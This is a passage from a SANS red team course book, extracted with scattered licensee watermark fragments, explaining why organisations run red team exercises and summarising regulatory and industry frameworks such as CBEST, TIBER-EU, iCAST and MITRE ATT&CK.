SANS Course: SEC567: Social Engineering for Penetration Testers https://www.sans.org/course/social-engineering-for-penetration-testers Reference: https://en.wikipedia.org/wiki/Red_team https://redteamjournal.com/blog/2018/11/climbing-the-red-teaming-ladder

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

19

© SANS Institute 2020 Motivation

090aff33bcb6e401ded410120bc9a268 Why Perform Red Team Exercises and Adversary Emulations? 26 ,2 02 0

• Obtain a holistic view of organization’s information security posture – Not just a “limited scope” assessment – “Can this breach/attack happen to us”

o.

co

m

>

Ap ril

[email protected]

• Measure people, process, and technology • Test assumptions • Train and improve the Blue Team

SEC564 | Red Team Exercises and Adversary Emulation

20

ak

er

@ ya

ho

22829180 i< an

nm

Motivation Why Perform Red Team Exercises and Adversary Emulations? There are multiple reasons for performing Red Team Exercises and Adversary Emulations:

Lincoln Mazzei nc o

ln

M

az

ze

Obtain a holistic view of organization’s information security posture Most offensive security assessments focus on technology and are limited in scope. “Test only this URL or these IPs.” While those types of vulnerability assessments and/or penetration tests are extremely valuable to the organization, they do not provide a holistic assessment or view of the entire organization’s security posture. An end-to-end, or full Cyber Kill Chain, adversary emulation will provide the holistic view and test the defense in depth strategy of the organization. It will answer the question: “Can this breach/attack happen to us?”

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

To :

Li

Measure people, process, and technology The only way to know that anything has improved is to measure it. With a real attack or breach, it is difficult to know the exact times of attacker actions to then correlate with the response. In a Red Team Exercise, the Red Team will capture times for every action to effectively measure the response of the people, process, and technology: What was detected? What was prevented? Was the process followed?

Li

Test Assumptions Often, stakeholders (particularly senior management) in organizations are under the assumption that something is working in a particular way. The Red Team can come in and test that assumption to prove that it is or is not valid. “Trust but verify.”

live

20

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Train and Improve Blue Teams Training the Blue Team is one of the most valuable aspects of Red Team Exercises and Adversary Emulations. Everyone in an organization can be considered part of the Blue Team (or defenders). From the Human Resources staff vetting new candidates before they begin working at the organization, to the analyst that identifies and reports phishing attempts. The social engineering portion of most Red Team exercises will focus on training the Blue Team that is considered non-security staff. Most mention of Blue Team infer Security Operations Center analysts who spend their time monitoring and defending a network. While they are the main Blue Team, everyone in the organization should be considered part of the Blue Team and a defender of the organization. Red Team exercises train the Security Operations Center analysts, Hunt team, Incident Response, Incident Management, and Forensic analysts the most.

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

21

© SANS Institute 2020 Holistic View of Organization’s Security Posture

090aff33bcb6e401ded410120bc9a268 An end-to-end assessment of the entire organization 26 ,2 02 0

• Main differentiator from penetration testing – Not a limited scope test targeting just a particular product, infrastructure, network, application, URL, or domain

[email protected]

Full Kill Chain from Recon to Objective Wide scope including all People, Process, and Technology Often blind, unannounced exercise Determine what TTPs would work, undetected if a true attack occurred

o.

co

m

>

Ap ril

• • • •

SEC564 | Red Team Exercises and Adversary Emulation

22

ak

er

@ ya

ho

22829180 i< an

nm

Holistic View of Organization’s Security Posture An end-to-end assessment of the entire organization provides a holistic view of the entire organization’s security posture. This is the main differentiator of a Red Team Adversary Emulation Exercise and a penetration test. Penetration Tests are often piecemealed and focus on only one particular technology or one type of test:

ze

Lincoln Mazzei ln

M

az

Network services test Client-side test Web application test Social engineering test Wireless security test Remote dial-up war dial test Physical security test Stolen equipment test Cryptanalysis attack Product security test (sometimes called a shrink-wrapped software test)

nc o

• • • • • • • • • •

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

Red Team Exercises focus on an end-to-end assessment of the entire organization based on the threat intelligence provided. Any and all of the above types of tests are fair game. Characteristics allowing for a holistic view of the entire organization’s security posture are: • • • •

22

live

Full Kill Chain from Recon to Objective Wide scope including all People, Process, and Technology Often blind, unannounced exercise Determine what TTPs would work, undetected if a true attack occurred

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Measure People, Process, and Technology

090aff33bcb6e401ded410120bc9a268 Document metrics and timeline of entire exercise Record All Actions and Times

26 ,2 02 0

To obtain initial access/patient zero To move laterally from system to system To identify, detect, and/or alert on each TTP To escalate events into incident To contain each host To eradicate

[email protected] Ap ril

– – – – – –

>



o.

– From SOC to Incident Handling to Hunting – Communications and alert to leadership of attack

co

m

Observe and Document Processes



SEC564 | Red Team Exercises and Adversary Emulation

23

ak

er

@ ya

ho

22829180 i< an

nm

Measure People, Process, and Technology The only way to know that anything has improved is to measure it. With a real attack or breach, it is difficult to know the exact times of attacker actions to then correlate with the response. In a Red Team Exercise, the Red Team will capture times for every action to effectively measure the following:

ze

Lincoln Mazzei ln

M

az

Time and TTPs to obtain initial access Time and TTPs that allowed moving laterally Time to detect TTPs; identify TTPs not prevented or detected Process and time to escalate events into incident Time to contain; Time to eradicate Process to engage hunt team Process to coordinate communications and alert leadership Process to corelate all events and realize sophisticated attack

nc o

• • • • • • • •

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

As more exercises are performed, those metrics can be correlated to show improvement of people, process, and technology over time.

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

23

© SANS Institute 2020 Testing Assumptions

090aff33bcb6e401ded410120bc9a268 That attack won’t work here because… “We applied the patches” – WannaCry, NotPetya, Equifax “We have outbound DLP” – Sony “Our users would never open a macro” – Dridex “Our network is segmented, and the only way out is through proxy” • “We have firewalls, AV, and IDS”

26 ,2 02 0

• • • •

o.

co

m

>

Ap ril

[email protected] Trust but Verify

SEC564 | Red Team Exercises and Adversary Emulation

24

ak

er

@ ya

ho

22829180 i< an

nm

Testing Assumptions Generally, when a major breach occurs and is made public, the question of “can it happen to us” gets asked. Many senior level staff in an organization will be quick to answer based on assumptions. Senior level staff is generally involved in approving budget, signing procurement documents, and bringing in the latest security and technology products to the organization. They generally interact with other senior level staff at the vendor organization that is selling them the latest and greatest to stop attackers.

az

ze

Lincoln Mazzei nc o

ln

M

All too often, those security products are then installed but not properly configured to provide the value they were procured for. Here is where the Red Team comes in to test the assumptions of these products, configurations, people, and processes.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK “We applied the patches” – WannaCry, NotPetya, Equifax • WannaCry and NotPetya took advantage of MS17-010, which was released by Microsoft months before the attack. Equifax breach leveraged a Struts vulnerability that had a patch. “We have outbound DLP” – Sony • Sony did not detect significant size of data leaving the network. “Our users would never open a macro” – Dridex • Dridex campaign relied on social engineering via email and enabling macros in Microsoft Office files.



ce

Li



ns

ed



To :

Li

That attack won’t work here because…

live

24

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 • •

“Our network is segmented, and the only way out is through proxy” • Most corporate networks only allow traffic out via proxy; however, it may not be limited to only HTTP and HTTPs “We have firewalls, AV, and IDS” – Everyone • Firewalls operate with Access Control Lists at the network layer; based on rules created by humans. • Antivirus is based on signatures that can be easily bypassed. • Intrusion Detection Systems monitor the network traffic and log when a signature is triggered.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Trust but Verify This is a common saying among security practitioners. We trust what the vendor is saying about their product, but we also want to verify and prove it.

[email protected] o.

co

m

>

Ap ril

References: https://en.wikipedia.org/wiki/WannaCry_ransomware_attack https://en.wikipedia.org/wiki/Petya_(malware) https://en.wikipedia.org/wiki/Sony_Pictures_hack https://en.wikipedia.org/wiki/Dridex

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

25

© SANS Institute 2020 Train and Improve the Blue Team

090aff33bcb6e401ded410120bc9a268 • Every Red Team Exercise will result in Blue Team getting better 26 ,2 02 0

• Lessons will be learned, and processes improved • The more you train, the more you improve • As you measure the people, process, and technology you will see improvements in:

[email protected] m

>

Ap ril

– Time to detect – Time to escalate – Time to eradicate

o.

co

• End of Day 2 will show how to report this at all levels SEC564 | Red Team Exercises and Adversary Emulation

26

ak

er

@ ya

ho

22829180 i< an

nm

Train and Improve the Blue Team Training the Blue Team is one of the most valuable aspects of Red Team Exercises and Adversary Emulations. Everyone in an organization can be considered part of the Blue Team (or defenders). From the Human Resources staff vetting new candidates before they begin working at the organization, to the analyst that identifies and reports phishing attempts. The social engineering portion of most Red Team exercises will focus on training the Blue Team that is considered non-security staff. Most mention of Blue Team infer Security Operations Center analysts who spend their time monitoring and defending a network. While they are the main Blue Team, everyone in the organization should be considered part of the Blue Team and a defender of the organization. Red Team exercises train the Security Operations Center analysts, Hunt team, Incident Response, Incident Management, and Forensic analysts the most.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

26

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Frameworks and Methodologies

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

27

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

27

© SANS Institute 2020 Frameworks and Methodologies

090aff33bcb6e401ded410120bc9a268 Cyber Kill Chain – Lockheed Martin



CBEST Intelligence Led Testing – Bank of England



Threat Intelligence-Based Ethical Red Teaming – TIBER-EU



Red Team: Adversarial Attack Simulation Exercises – ABS (Association of Banks of Singapore)



Intelligence-led Cyber Attack Simulation Testing (iCAST) – HKMA (Hong Kong Monetary Authority)



G-7 Fundamental Elements for Threat-Led Penetration Testing (G7FE-TLPT)



A Framework for the Regulatory Use of Penetration Testing and Red Teaming in the Financial Services Industry – GFMA (Global Financial Markets Association)



ATT&CK



Unified Cyber Kill Chain – Paul Pols

26 ,2 02 0



co

– MITRE

o.

TM

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

28

ak

er

@ ya

ho

22829180 i< an

nm

Frameworks and Methodologies There are many Red Team, Penetration Testing, and Adversary Emulation frameworks available for public use. As one can see from some of the top ones in the industry, the term Penetration Testing, Red Teaming, Adversary Emulation, and Adversary Simulation are all used in various ways. As information security practitioners, we know to understand the scope of the request or proposal and use the correct name for the assessment.

az

ze

Lincoln Mazzei ln

Cyber Kill Chain – Lockheed Martin CBEST Intelligence Led Testing – Bank of England Threat Intelligence-Based Ethical Red Teaming – TIBER-EU Red Team: Adversarial Attack Simulation Exercises – ABS (Association of Banks of Singapore) intelligence-led Cyber Attack Simulation Testing (iCAST) – HKMA (Hong Kong Monetary Authority) G-7 Fundamental Elements for Threat-Led Penetration Testing (G7FE-TLPT) A Framework for the Regulatory Use of Penetration Testing and Red Teaming in the Financial Services Industry – GFMA (Global Financial Markets Association) ATT&CK (Adversaries Tactics, Techniques, and Common Knowledge) – MITRE Unified Cyber Kill Chain – Paul Pols

nc o

• • • • • • •

M

We will cover the following frameworks and methodologies in the next few slides:

To :

ed

ns

ce

Li

• •

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK The general guide is to not reinvent the wheel but to leverage one or a few of these frameworks to create your own internal framework or methodology for performing Red Team Exercises and Adversary Emulations. It is key to ensure you use and document a framework or methodology to ensure your assessments are documented and repeatable. This is a main differentiator from a professional assessment and a key to success.

live

Provided Material: The folder Frameworks and Methodologies in the provided material has most of the documents for these frameworks.

28

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 The Cyber Kill Chain

One of the first examples of a structured description of attacks was 090aff33bcb6e401ded410120bc9a268 the Cyber Kill Chain , by Lockheed Martin:

26 ,2 02 0

®

Command & Control

Exploitation

Weaponization

Delivery

Installation

o.

Reconnaissance

co

m

>

Ap ril

[email protected] Action on Objectives

SEC564 | Red Team Exercises and Adversary Emulation

29

ak

er

@ ya

ho

22829180 i< an

nm

The Cyber Kill Chain Different groups and organizations have worked on documenting adversaries' methods in a digital kill chain. Lockheed Martin developed the “Cyber Kill Chain”, which has risen in popularity to become one of the most used frameworks to describe cyber attacks. An alternative, slightly adopted variant is Dell SecureWorks’ “Cyber Kill Chain.” Both chains have more steps than the military kill chain.

M ln nc o

Lockheed Martin: • Reconnaissance • Weaponization • Delivery • Exploitation • Installation • Command & Control • Actions On Objectives

az

ze

Lincoln Mazzei Dell SecureWorks: • Target Defined • Recon • Development • Weaponization • Delivery • Exploitation • Installation • Command & Control • Actions on Objectives • Objective Met

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK References: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-IntelDriven-Defense.pdf https://www.secureworks.com/resources/wp-breaking-the-kill-chain

live

Credit Thanks to Erik Van Buggenhout for the graphics on this slide.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

29

© SANS Institute 2020 CBEST Intelligence Led Testing

090aff33bcb6e401ded410120bc9a268 • Produced by the Bank of England Sector Cyber Team (SCT) 26 ,2 02 0

• Currently at version 2.0 • Multiple stakeholders involved: Participant Firm, Regulators, CST, Threat Intelligence Provider, Penetration Testing provider • Four phases:

[email protected] o.

• Providers must be CREST certified

co

m

>

Ap ril

– Initiation Phase – Threat Intelligence Phase – Penetration Testing Phase – Closure Phase

SEC564 | Red Team Exercises and Adversary Emulation

30

ak

er

@ ya

ho

22829180 i< an

nm

CBEST Intelligence Led Testing CBEST is a framework to deliver controlled, bespoke, intelligence-led cyber security tests. The tests replicate behaviors of threat actors, assessed by the UK Government and commercial intelligence providers as posing a genuine threat to systemically important financial institutions.

ze

Lincoln Mazzei nc o

ln

M

az

Institutions that form part of the United Kingdom’s Financial Services Sector must remain resilient to cyber attack. To help these organizations achieve this goal, the Bank of England has implemented the CBEST security assessment framework. CBEST promotes an intelligence-led penetration testing approach that mimics the actions of cyber attacker's intent on compromising an organization's Critical Functions and the technology assets and people supporting those functions. Collaboration, evidence and improvement lie at the heart of CBEST as well as a close liaison with the Bank of England and relevant regulators. For those organizations that form part of the Critical National Infrastructure liaison with GCHQ may also be required. What differentiates CBEST from other security testing regimes is its intelligence-led approach. This is the "golden thread" that runs throughout the entire length of a CBEST assessment. It means that all activities are traceable to an organization's role in supporting the wider economy and the credible threats to that role that the organization faces.

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK • • • • •

30

Li

ce

The stakeholders involved in a CBEST assessment are: The CBEST participant Firm/FMI (Financial Market Infrastructure) The Regulator(s): Either the Prudential Regulatory Authority (PRA), Financial Market Infrastructure Directorate (FMID) or Financial Conduct Authority (FCA) (Note, for dual regulated entities, both the PRA and the FCA will be required) The Bank of England Cyber Sector Team (CST) The Threat Intelligence (TI) service provider The Penetration Testing (PT) service provider

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 The CBEST assessment process consists of four phases of work: •

The Initiation Phase during which the CBEST assessment is formally launched, the scope is established, and TI/PT service providers are procured The Threat Intelligence Phase during which the core threat intelligence deliverables are produced, threat scenarios are developed into a draft Penetration Test Plan, threat intelligence capability is assessed, and control is handed over to the PT service provider The Penetration Testing Phase during which an intelligence-led penetration test against the target systems and services that underpin each Critical Function in scope is planned, executed and reviewed, and detection and response capabilities are assessed The Closure Phase during which the SCT produces its Intelligence, Detection, and Response Report, the Firm/FMI’s Remediation Plan is finalized, the TI/PT service providers are debriefed, and the Regulator(s) supervises the execution of the Remediation Plan





[email protected] Ap ril



26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

During the Initiation Phase and Closure Phase the Firm/FMI takes the lead. During the Threat Intelligence Phase and Penetration Testing Phase, the CBEST assessment is led by the TI service provider and PT service provider respectively. That said, the overall approach to managing a CBEST assessment has to be collaborative for it to work effectively. The primary points of day-to-day contact within the TI/PT service providers are the Project Managers, the CREST Certified Threat Intelligence Manager (CCTIM) and the CREST Certified Simulated Attack Manager (CCSAM).

@ ya

ho

22829180 ak

er

Bank of England authorizes and owns the list of organizations that may provide CBEST services: https://www.crest-approved.org/members-2/members-supplying-cbest-services/index.html

i< an

nm

Reference: https://www.bankofengland.co.uk/-/media/boe/files/financial-stability/financial-sector-continuity/cbestimplementation-guide

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

31

© SANS Institute 2020 Threat Intelligence-Based Ethical Red Teaming (TIBER-EU)

090aff33bcb6e401ded410120bc9a268 Central framework for all EU Allows for cross-jurisdictional activities

• •

26 ,2 02 0

– Mutual recognition – Independent third-party providers

Four phases

[email protected] Ap ril

Generic Threat Landscape (GTL) Phase Preparation Phase Testing Phase Closure Phase

>

– – – –

m



o.

co

White Team Guidance Service Procurement Guidelines

• •

SEC564 | Red Team Exercises and Adversary Emulation

32

ak

er

@ ya

ho

22829180 i< an

nm

Threat Intelligence-Based Ethical Red Teaming (TIBER-EU) TIBER-EU is a framework that delivers a controlled, bespoke, intelligence-led red team test of entities’ critical live production systems. Intelligence-led red team tests mimic the tactics, techniques and procedures of real-life threat actors who, on the basis of threat intelligence, are perceived as posing a genuine threat to those entities. An intelligence-led red team test involves the use of a variety of techniques to simulate an attack on an entity’s critical functions and underlying systems (i.e. its people, processes and technologies). It helps an entity to assess its protection, detection and response capabilities.

M

az

ze

Lincoln Mazzei nc o

ln

The Threat Intelligence-based Ethical Red Teaming (TIBER-EU) Framework enables European and national authorities to work with financial infrastructures and institutions to put in place a program to test and improve their resilience against sophisticated cyber attacks. The ECB published three documents:

To :

ed

• •

TIBER-EU Framework (TIBER-EU Framework: How to Implement the European Framework for Threat Intelligence-based Ethical Red Teaming) TIBER-EU Services Procurement Guidelines TIBER-EU White Team Guidance

ns



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

TIBER-EU is an instrument for red team testing, designed for use by core financial infrastructures, whether at national or at European level, which can also be used by any type or size of entity across the financial and other sectors. At the same time, TIBER-EU is designed to be adopted by the relevant authorities in any jurisdiction, on a voluntary basis and from a variety of perspectives, namely as a supervisory or oversight tool, for financial stability purposes, or as a catalyst. TIBER-EU facilitates red team testing for entities that are active in more than one jurisdiction and fall within the regulatory remit of several authorities. TIBER-EU provides the elements allowing either collaborative cross-authority testing or mutual recognition by relevant authorities on the basis of different sets of requirements being met.

live

References: https://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_framework.en.pdf https://www.ecb.europa.eu/pub/pdf/other/ecb.tibereu.en.pdf

32

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Red Team: Adversarial Attack Simulation Exercises

090aff33bcb6e401ded410120bc9a268 • Guidelines for the Financial Industry in Singapore • Four phases

26 ,2 02 0

– Planning – Attack preparation – Attack execution – Exercise closure

Ap ril

[email protected] o.

co

m

>

• Includes Attack/Defense Joint Replay • Appendix has example reports for preparation, threat modelling, targeting, execution log, exercise report, cleanup, defense, and remediation action plan SEC564 | Red Team Exercises and Adversary Emulation

33

ak

er

@ ya

ho

22829180 i< an

nm

Red Team: Adversarial Attack Simulation Exercises The Association of Banks in Singapore (ABS), with support from the Monetary Authority of Singapore (MAS), has developed a set of cybersecurity assessment guidelines today to strengthen the cyber resilience of the financial sector in Singapore. Known as the Adversarial Attack Simulation Exercises (AASE) Guidelines or “Red Teaming” Guidelines, the Guidelines provide financial institutions (FIs) with best practices and guidance on planning and conducting Red Teaming exercises to enhance their security testing.

az

ze

Lincoln Mazzei ln

M

This is possibly the newest framework released and currently in its first version.

nc o

Reference: https://abs.org.sg/docs/library/abs-red-team---adversarial-attack-simulation-exercises-guidelines.pdf

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

33

© SANS Institute 2020 Intelligence-Led Cyber Attack Simulation Testing (iCAST)

090aff33bcb6e401ded410120bc9a268 • Hong Kong Monetary Authority as part of larger Cyber Initiative 26 ,2 02 0

• Allows for self-testing • Phases – Scoping – Analyzing Threat Intelligence – Testing Scenarios – various TTPs – Testing – Reporting – 3 reports

m

>

Ap ril

[email protected] o.

co

• iCAST simulation test summary • Threat intelligence report • Simulation testing report

SEC564 | Red Team Exercises and Adversary Emulation

34

ak

er

@ ya

ho

22829180

Lincoln Mazzei az

ze

Cyber Resilience Assessment Framework (C-RAF) Cyber Intelligence Sharing Platform Professional Development Program(PDP)

M

• • •

i< an

nm

Intelligence-Led Cyber Attack Simulation Testing (iCAST) Hong Kong Monetary Authority (HKMA) has developed a Cyber Fortification Initiative (CFI), which comprises three components:

• • •

nc o

ln

C-RAG compromised the following elements: Inherent risk assessment Maturity assessment Intelligence-led cyber attack simulation testing (iCAST)

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Under iCAST, the traditional penetration test is augmented by further validation of the knowledge of the penetration tester(s) and threat intelligence to formulate end-to-end testing scenarios (from attack initiation to achieving pre-defined test goal(s). Testing scenarios include story lines and testing goals: (i) get access to, delete or alter a specific piece of information; (ii) control of certain access rights of a critical system or service; iii) bring down a critical system, system component and/or service of the AIs, iv) encrypting important files for ransom, v) initiating funds movements to other AIs, etc.

live

Reference: https://www.hkma.gov.hk/media/eng/doc/key-information/speeches/s20160518e2.pdf

34

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 G-7 Fundamental Elements for Threat-Led Penetration Testing (G7FE-TLPT)

090aff33bcb6e401ded410120bc9a268 • Involves strong multi-stakeholder engagement throughout the 26 ,2 02 0

assessment process • Six fundamental elements:

– Scoping and Risk Management – Resourcing – Threat Intelligence – Penetration Testing – Closure and Remediation – Thematic data

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

35

ak

er

@ ya

ho

22829180 i< an

nm

G-7 Fundamental Elements for Threat-Led Penetration Testing (G7FE-TLPT) The G-7 Fundamental Elements for Threat-Led Penetration Testing (G7FE-TLPT) provide entities with a guide for the assessment of their resilience against malicious cyber incidents through simulation and a guide for authorities considering the use of Threat-Led Penetration Testing (TLPT) within their jurisdictions. These fundamental elements are intended to complement a wider suite of cyber resilience assessment tools and techniques and are not meant to be considered as a singular approach.

az

ze

Lincoln Mazzei nc o

ln

M

TLPT1 is a controlled attempt to compromise the cyber resilience of an entity by simulating the tactics, techniques and procedures of real-life threat actors. It is based on targeted threat intelligence and focuses on an entity’s people, processes and technology, with minimal foreknowledge and impact on operations.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

One of the core objectives of the G7FE-TLPT is to contribute to the improvement of the cyber resilience of entities and the financial sector more generally. An important means of achieving this is the production and sharing of thematic data among authorities and entities. Thematic data should identify common sector findings and vulnerabilities. All thematic results must prevent identification of individual entities. Jurisdictions have the discretion of using their own recognized frameworks as the base for creating post-TLPT thematics and the production of thematic data relating to TLPT engagements is the responsibility of the relevant authorities. Authorities may consider a number of approaches to information sharing, where appropriate and consistent with data protection and cross-jurisdictional information sharing norms.

live

Reference: https://www.fin.gc.ca/activty/G7/pdf/G7-penetration-testing-tests-penetration-eng.pdf

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

35

© SANS Institute 2020 A Framework for the Regulatory Use of Penetration Testing and Red Teaming in the Financial Services Industry



The Global Financial Markets Association (GFMA) published framework to create an agreed upon approach for regulators and financial services firms to conduct effective testing to satisfy both supervisory and firm originated requirements.



Concept of De-chain: A point in the test execution where a scenario is artificially progressed to compensate for time limitations or replicate control failures (e.g., if a phishing exercise has not resulted in compromise of a system within a given time frame, the testers may be given access to allow the testing to progress).

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

36

ak

er

@ ya

ho

22829180 i< an

nm

A Framework for the Regulatory Use of Penetration Testing and Red Teaming in the Financial Services Industry Due to the amount of frameworks released by individual regulatory bodies, the Global Financial Markets Association (GFMA) published framework to create an agreed upon approach for regulators and financial services firms to conduct effective testing to satisfy both supervisory and firm originated requirements.

az

ze

Lincoln Mazzei ln

Engage regulators globally with a common framework to facilitate open dialogue Ensure regulatory concerns and recommendations are considered Establish an industry-wide process where emerging technologies, threats, industry-leading practices and regulatory requirements drive continued iteration of the Framework

nc o

• • •

M

The Framework’s objectives are to:

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

“The GFMA Pen Testing Framework provides a guide for the development of a safe, secure and scalable testing program which provides a basis for joint agreement between financial service firms and regulators for conducting effective testing while managing operational risk. The industry believes regulatory consistency is critical to efficient and effective cybersecurity. We are hopeful the level of coordination outlined in the Framework allows for the continued confidence and growth of the world’s financial markets and economy.” The Framework outlines a four-phased Testing Lifecycle to ensure firms are following industry best practices while simultaneously meeting regulatory demands. The four phases of firm-led red teaming or penetration testing are the following:

live

• •

36

Threat Intelligence Phase: A firm’s internal intelligence should be augmented by government agencies and sector level financial industry resources. Final threat intelligence scenarios should be approved by regulators where applicable. Planning Phase: Test activities should be prioritized and scheduled according to threat intelligence and regulator input in planning the scope of the exercise.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 • •

Testing Phase: Testing should begin after operational planning and attack methodologies are agreed upon. Analysis and Response Phase: This phase will include the development of executive / technical reports and associated firm response. Summary versions of these final reports may be distributed internally within the firm and to regulators and would include a sign-off from the organization’s Board on the identified vulnerabilities and associated remediation plan.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Reference: https://www.gfma.org/correspondence/gfma-framework-for-the-regulatory-use-of-penetration-testing-in-thefinancial-services-industry/

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

37

© SANS Institute 2020 MITRE ATT&CK

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] ho

22829180

38

ak

er

@ ya

SEC564 | Red Team Exercises and Adversary Emulation

i< an

nm

MITRE ATT&CK ATT&CK stands for Adversaries Tactics, Techniques, and Common Knowledge. MITRE has developed the ATT&CK Matrix as a central repository for adversary TTPs and separated it into 12 tactics. Think of it as a knowledge base of adversary behavior. It is based on real-world observations. It is free, open, and globally accessible to everyone (Red Teams and Blue Teams alike). It is rapidly gaining traction as a de facto standard as it has a common language and is community driven.

az

ze

Lincoln Mazzei nc o

ln

M

The top row are the “tactics” or the adversary’s goals. Each column of tactics have “techniques” that adversary’s use to achieve their goals. If you click on a given technique, you will see more information about it including a high-level description, “procedures” for emulating the respective technique, mitigations, detection, and references. Note that there may be various procedures for a single technique.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

To :

Red teams can emulate realistic TTPs through research and experience and much of this information has been complied into ATT&CK. Blue teams can use this to build a scorecard of how well they are able to defend against the various TTPs. Frameworks developed for Windows, Linux, and Mac.

Li

ce

From the official website: “MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on realworld observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community. With the creation of ATT&CK, MITRE is fulfilling its mission to solve problems for a safer world — by bringing communities together to develop more effective cybersecurity. ATT&CK is open and available to any person or organization for use at no charge.”

live

Reference: https://attack.mitre.org/

38

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Unified Kill Chain – Paul Pols

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

co

m

>

Ap ril

[email protected] o.

The Unified Kill Chain is a good answer to some of the Cyber Kill Chain limitations!

ho

22829180

SEC564 | Red Team Exercises and Adversary Emulation

ak

er

@ ya

39

i< an

nm

Unified Kill Chain – Paul Pols The Cyber Kill Chain (CKC) has many limitations due to its simplistic and high-level view. Upon its release, it received mixed reviews from information security practitioners. The main critic is that it reinforces traditional perimeter-focused and malware-prevention thinking; it pays little to no attention to the internal network and what happens once access is obtained. Multiple practitioners and companies began releasing similar but more expanded Kill Chains. The Paul Pols paper on Unified Kill Chain reviewed all of these and came up with a more realistic and accurate approach.

M

az

ze

